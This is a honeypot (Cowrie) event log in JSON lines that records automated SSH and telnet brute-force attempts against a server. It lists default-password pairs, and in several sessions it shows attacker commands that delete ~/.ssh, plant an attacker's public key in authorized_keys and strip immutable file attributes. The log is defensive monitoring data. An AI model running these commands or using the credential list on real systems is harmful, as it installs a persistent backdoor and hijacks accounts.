{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:54:20.116896Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:54:20.331073Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:20.332052Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55118,"dst_ip":"1.2.3.4","dst_port":22,"session":"43908a3cd0ed","protocol":"ssh","message":"New connection: 212.227.235.229:55118 (1.2.3.4:22) [session: 43908a3cd0ed]","sensor":"my-vps","timestamp":"2025-08-28T15:54:20.577492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:54:20.578398Z","src_ip":"212.227.235.229","session":"43908a3cd0ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:54:20.808068Z","src_ip":"212.227.235.229","session":"43908a3cd0ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:54:21.770589Z","src_ip":"212.227.235.229","session":"43908a3cd0ed"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:23.004272Z","src_ip":"212.227.235.229","session":"43908a3cd0ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55934,"dst_ip":"1.2.3.4","dst_port":22,"session":"03b9c85ba1ac","protocol":"ssh","message":"New connection: 212.227.235.229:55934 (1.2.3.4:22) [session: 03b9c85ba1ac]","sensor":"my-vps","timestamp":"2025-08-28T15:54:23.231504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:54:23.232681Z","src_ip":"212.227.235.229","session":"03b9c85ba1ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:54:23.462028Z","src_ip":"212.227.235.229","session":"03b9c85ba1ac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:54:24.417093Z","src_ip":"212.227.235.229","session":"03b9c85ba1ac"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:24.630948Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:24.647318Z","src_ip":"212.227.235.229","session":"03b9c85ba1ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48685,"dst_ip":"1.2.3.4","dst_port":23,"session":"065f095ba428","protocol":"telnet","message":"New connection: 212.227.235.229:48685 (1.2.3.4:23) [session: 065f095ba428]","sensor":"my-vps","timestamp":"2025-08-28T15:54:47.101673Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57410,"dst_ip":"1.2.3.4","dst_port":23,"session":"e40c4effd235","protocol":"telnet","message":"New connection: 212.227.125.160:57410 (1.2.3.4:23) [session: e40c4effd235]","sensor":"my-vps","timestamp":"2025-08-28T15:54:59.400293Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:54:59.485465Z","src_ip":"212.227.125.160","session":"e40c4effd235"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:54:59.507805Z","src_ip":"212.227.125.160","session":"e40c4effd235"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56168,"dst_ip":"1.2.3.4","dst_port":22,"session":"376312c457cf","protocol":"ssh","message":"New connection: 212.227.235.229:56168 (1.2.3.4:22) [session: 376312c457cf]","sensor":"my-vps","timestamp":"2025-08-28T15:55:01.243030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:01.251733Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:01.536993Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Wb123456@","message":"login attempt [root/Wb123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:02.653772Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:03.594334Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:03.594916Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:03.596046Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:03.834094Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48326,"dst_ip":"1.2.3.4","dst_port":22,"session":"5255e3e7d9ef","protocol":"ssh","message":"New connection: 212.227.235.229:48326 (1.2.3.4:22) [session: 5255e3e7d9ef]","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.203819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.204518Z","src_ip":"212.227.235.229","session":"5255e3e7d9ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:04.324716Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.325578Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.519087Z","src_ip":"212.227.235.229","session":"5255e3e7d9ef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.569922Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.570892Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55816,"dst_ip":"1.2.3.4","dst_port":22,"session":"31a030783714","protocol":"ssh","message":"New connection: 212.227.235.229:55816 (1.2.3.4:22) [session: 31a030783714]","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.777851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:04.786294Z","src_ip":"212.227.235.229","session":"31a030783714"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:05.011627Z","src_ip":"212.227.235.229","session":"31a030783714"}
{"eventid":"cowrie.login.failed","username":"certbot","password":"certbot","message":"login attempt [certbot/certbot] failed","sensor":"my-vps","timestamp":"2025-08-28T15:55:05.827531Z","src_ip":"212.227.235.229","session":"5255e3e7d9ef"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:55:05.954609Z","src_ip":"212.227.235.229","session":"31a030783714"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:07.144932Z","src_ip":"212.227.235.229","session":"5255e3e7d9ef"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:07.234014Z","src_ip":"212.227.235.229","session":"31a030783714"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55828,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f35d202be4","protocol":"ssh","message":"New connection: 212.227.235.229:55828 (1.2.3.4:22) [session: 36f35d202be4]","sensor":"my-vps","timestamp":"2025-08-28T15:55:07.533935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:07.543316Z","src_ip":"212.227.235.229","session":"36f35d202be4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:07.786544Z","src_ip":"212.227.235.229","session":"36f35d202be4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:08.697589Z","src_ip":"212.227.235.229","session":"36f35d202be4"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:08.914815Z","src_ip":"212.227.235.229","session":"376312c457cf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:08.923347Z","src_ip":"212.227.235.229","session":"36f35d202be4"}
{"eventid":"cowrie.session.closed","duration":31.40614652633667,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:18.507752Z","src_ip":"212.227.235.229","session":"065f095ba428"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47240,"dst_ip":"1.2.3.4","dst_port":22,"session":"341520631f72","protocol":"ssh","message":"New connection: 212.227.235.229:47240 (1.2.3.4:22) [session: 341520631f72]","sensor":"my-vps","timestamp":"2025-08-28T15:55:21.177167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:21.178107Z","src_ip":"212.227.235.229","session":"341520631f72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:21.394788Z","src_ip":"212.227.235.229","session":"341520631f72"}
{"eventid":"cowrie.login.failed","username":"openvswitch","password":"openvswitch123","message":"login attempt [openvswitch/openvswitch123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:55:22.314019Z","src_ip":"212.227.235.229","session":"341520631f72"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:23.534652Z","src_ip":"212.227.235.229","session":"341520631f72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50976,"dst_ip":"1.2.3.4","dst_port":22,"session":"b833f4fd2039","protocol":"ssh","message":"New connection: 212.227.235.229:50976 (1.2.3.4:22) [session: b833f4fd2039]","sensor":"my-vps","timestamp":"2025-08-28T15:55:32.055401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:32.056220Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
